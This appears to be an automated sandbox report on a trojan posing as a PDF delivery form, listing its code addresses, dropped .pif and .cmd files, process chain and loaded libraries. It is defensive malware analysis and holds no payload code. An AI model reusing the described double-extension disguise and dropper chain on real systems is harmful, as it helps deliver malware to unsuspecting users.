Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEFCF2	12_2_1CCEFCF2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCA9C32	12_2_1CCA9C32
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC4FDC0	12_2_1CC4FDC0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC33D40	12_2_1CC33D40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE1D5A	12_2_1CCE1D5A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE7D73	12_2_1CCE7D73
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC39EB0	12_2_1CC39EB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC31F92	12_2_1CC31F92
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEFFB1	12_2_1CCEFFB1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEFF09	12_2_1CCEFF09
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC338E0	12_2_1CC338E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC9D800	12_2_1CC9D800
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC39950	12_2_1CC39950
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC4B950	12_2_1CC4B950
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCC5910	12_2_1CCC5910
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCDDAC6	12_2_1CCDDAC6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCCDAAC	12_2_1CCCDAAC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC75AA0	12_2_1CC75AA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD1AA3	12_2_1CCD1AA3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEFA49	12_2_1CCEFA49
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE7A46	12_2_1CCE7A46
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCA3A6C	12_2_1CCA3A6C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCA5BF0	12_2_1CCA5BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC6DBF9	12_2_1CC6DBF9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC4FB80	12_2_1CC4FB80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEFB76	12_2_1CCEFB76
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC21460	12_2_1CC21460
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEF43F	12_2_1CCEF43F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCCD5B0	12_2_1CCCD5B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE7571	12_2_1CCE7571
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE16CC	12_2_1CCE16CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEF7B0	12_2_1CCEF7B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCDF0CC	12_2_1CCDF0CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC370C0	12_2_1CC370C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE70E9	12_2_1CCE70E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEF0E0	12_2_1CCEF0E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC3B1B0	12_2_1CC3B1B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCFB16B	12_2_1CCFB16B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC6516C	12_2_1CC6516C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC1F172	12_2_1CC1F172
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC4B2C0	12_2_1CC4B2C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD12ED	12_2_1CCD12ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC352A0	12_2_1CC352A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC7739A	12_2_1CC7739A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC1D34C	12_2_1CC1D34C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE132D	12_2_1CCE132D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC20CF2	12_2_1CC20CF2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD0CB5	12_2_1CCD0CB5
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC30C00	12_2_1CC30C00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC2ADE0	12_2_1CC2ADE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC48DBF	12_2_1CC48DBF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC3AD00	12_2_1CC3AD00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCCCD1F	12_2_1CCCCD1F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEEEDB	12_2_1CCEEEDB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC42E90	12_2_1CC42E90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCECE93	12_2_1CCECE93
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC30E59	12_2_1CC30E59
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEEE26	12_2_1CCEEE26
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC22FC8	12_2_1CC22FC8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC3CFE0	12_2_1CC3CFE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCAEFA0	12_2_1CCAEFA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCA4F40	12_2_1CCA4F40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC72F28	12_2_1CC72F28
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC50F30	12_2_1CC50F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD2F30	12_2_1CCD2F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC5E8F0	12_2_1CC5E8F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC168B8	12_2_1CC168B8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC3A840	12_2_1CC3A840
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC32840	12_2_1CC32840
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC329A0	12_2_1CC329A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCFA9A6	12_2_1CCFA9A6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC46962	12_2_1CC46962
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC2EA80	12_2_1CC2EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE6BD7	12_2_1CCE6BD7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEAB40	12_2_1CCEAB40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCDE4F6	12_2_1CCDE4F6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE2446	12_2_1CCE2446
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD4420	12_2_1CCD4420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCF0591	12_2_1CCF0591
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC30535	12_2_1CC30535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC4C6E0	12_2_1CC4C6E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC2C7C0	12_2_1CC2C7C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC54750	12_2_1CC54750
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC30770	12_2_1CC30770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCC2000	12_2_1CCC2000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCE81CC	12_2_1CCE81CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCF01AA	12_2_1CCF01AA
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCB8158	12_2_1CCB8158
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC20100	12_2_1CC20100
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCCA118	12_2_1CCCA118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCB02C0	12_2_1CCB02C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCD0274	12_2_1CCD0274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCF03E6	12_2_1CCF03E6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC3E3F0	12_2_1CC3E3F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CCEA352	12_2_1CCEA352
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00401560	12_1_00401560
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00402058	12_1_00402058
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_004025B0	12_1_004025B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00402870	12_1_00402870
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_004010E0	12_1_004010E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00403230	12_1_00403230
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_004012C0	12_1_004012C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00403350	12_1_00403350
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00401553	12_1_00401553
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00401D69	12_1_00401D69
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_1_00401D70	12_1_00401D70

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\xnxcxbpC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: String function: 02CB46A4 appears 154 times
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: String function: 02CC87A0 appears 48 times
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: String function: 02CB480C appears 619 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 1CC9EA12 appears 86 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 22AB5130 appears 58 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 22AFF290 appears 105 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 1CCAF290 appears 105 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 1CC65130 appears 58 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 1CC77E54 appears 102 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 22AC7E54 appears 102 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 22A6B970 appears 280 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 1CC1B970 appears 280 times
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: String function: 22AEEA12 appears 86 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CD44D0 appears 32 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CD46A4 appears 244 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CE8824 appears 45 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CE87A0 appears 54 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CD44AC appears 73 times
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: String function: 02CD480C appears 931 times

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: Cpbxcxnx.PIF.0.dr	Binary string: \Device\Floppy0U
Source: Cpbxcxnx.PIF.0.dr	Binary string: \Device\Floppy0

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/7@2/2

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CD7F5C GetDiskFreeSpaceA,

0_2_02CD7F5C

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CE6D50 CoCreateInstance,

0_2_02CE6D50

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

File created: C:\Users\Public\CpbxcxnxF.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Virustotal: Detection: 54%
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

File read: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe"
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Cpbxcxnx.PIF "C:\Users\Public\Libraries\Cpbxcxnx.PIF"
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Cpbxcxnx.PIF "C:\Users\Public\Libraries\Cpbxcxnx.PIF"
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
